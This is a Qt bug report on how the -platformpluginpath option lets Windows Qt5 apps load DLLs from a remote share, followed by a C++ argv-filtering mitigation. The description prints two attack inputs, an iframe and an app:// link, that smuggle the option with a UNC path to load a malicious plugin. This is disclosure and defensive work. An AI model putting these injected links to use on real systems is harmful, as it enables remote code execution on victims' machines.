Qt / QTBUG-75882

commandline - platformpluginpath may cause serious Problem


    Details

    • Platform/s:
      Windows

      Description

      The Qt5 application, depending on certain metadata, will automatically execute the plugins pointed to by platformpluginpath as soon as they are loaded in memory.

      For example,

      myTest.exe -platformpluginpath C:/Path-of-library/specific

      will load and execute all DLLs in the C:/Path-of-library/specific/imageformats directory. 

       <iframe src='myTest;?" - platformpluginpath \\192.162.x.y\share "'>

      Now this remote “share” contains an “imageformats” directory that holds a “malicious.dll” file. Since Qt loads plugins based on the metadata, the DLL name does not matter.

      Another scenario:

      A user registers a custom URL scheme for one application in Windows, e.g. app://. The user has this application installed and the URL scheme registered.

      Create a webpage with a link to 'app://? "-platformpluginpath \\SERVER\SharedFolder\"'.

      When the user opens such a page on his PC and clicks this link, your application is started on his machine and the platform plugin is loaded from the shared folder. This platform plugin can be qwindows.dll with injected code.

      There are two nicely detailed articles here about this potentially dangerous situation:

       

      https://www.thezdi.com/blog/2019/4/3/loading-up-a-pair-of-qt-bugs-detailing-cve-2019-1636-and-cve-2019-6739

       

      https://www.bleepingcomputer.com/news/security/qt5-based-gui-apps-susceptible-to-remote-code-execution/
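
One partial mitigation for the URL-handler scenario described above, shown as an added example (not code from this report or from Qt): filter argv before it is handed to QApplication, so options that redirect plugin loading never reach Qt. The function name `stripPluginOptions`, the blocked-option list and the sample argv are assumptions of this example.

```cpp
// Added example: strip Qt plugin-loading options from argv before Qt parses it.
#include <cstddef>
#include <iostream>
#include <string>
#include <vector>

// Options that take a value and steer which plugins Qt loads. Dropping all
// four is this example's policy for URL-handler launches, not Qt behaviour.
static const char *const kBlocked[] = {
    "-platformpluginpath", "-platform", "-platformtheme", "-plugin"};

// Normalise "--opt" to "-opt" so both spellings are matched.
static std::string normalise(const std::string &arg) {
    if (arg.size() > 2 && arg[0] == '-' && arg[1] == '-')
        return arg.substr(1);
    return arg;
}

static bool isBlocked(const std::string &arg) {
    const std::string n = normalise(arg);
    for (const char *opt : kBlocked)
        if (n == opt)
            return true;
    return false;
}

// Returns a copy of args without blocked options and the value following each.
// args[0] (the program name) is always kept.
std::vector<std::string> stripPluginOptions(const std::vector<std::string> &args) {
    std::vector<std::string> out;
    for (std::size_t i = 0; i < args.size(); ++i) {
        if (i > 0 && isBlocked(args[i])) {
            if (i + 1 < args.size())
                ++i; // skip the option's value as well
            continue;
        }
        out.push_back(args[i]);
    }
    return out;
}

int main() {
    // Constructed argv, shaped like the one the link quoted in the report produces.
    std::vector<std::string> args = {"myTest.exe", "app://?", "-platformpluginpath",
                                     "\\\\SERVER\\SharedFolder\\"};
    for (const std::string &a : stripPluginOptions(args))
        std::cout << a << '\n';
    return 0;
}
```

Build the `char *` array passed to `QApplication` from the returned vector and keep it alive for the lifetime of the application object, since Qt keeps referring to argc and argv after construction.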


            People

            Assignee:
            thiago Thiago Macieira
            Reporter:
            irfan.omair@digia.com Irfan Omair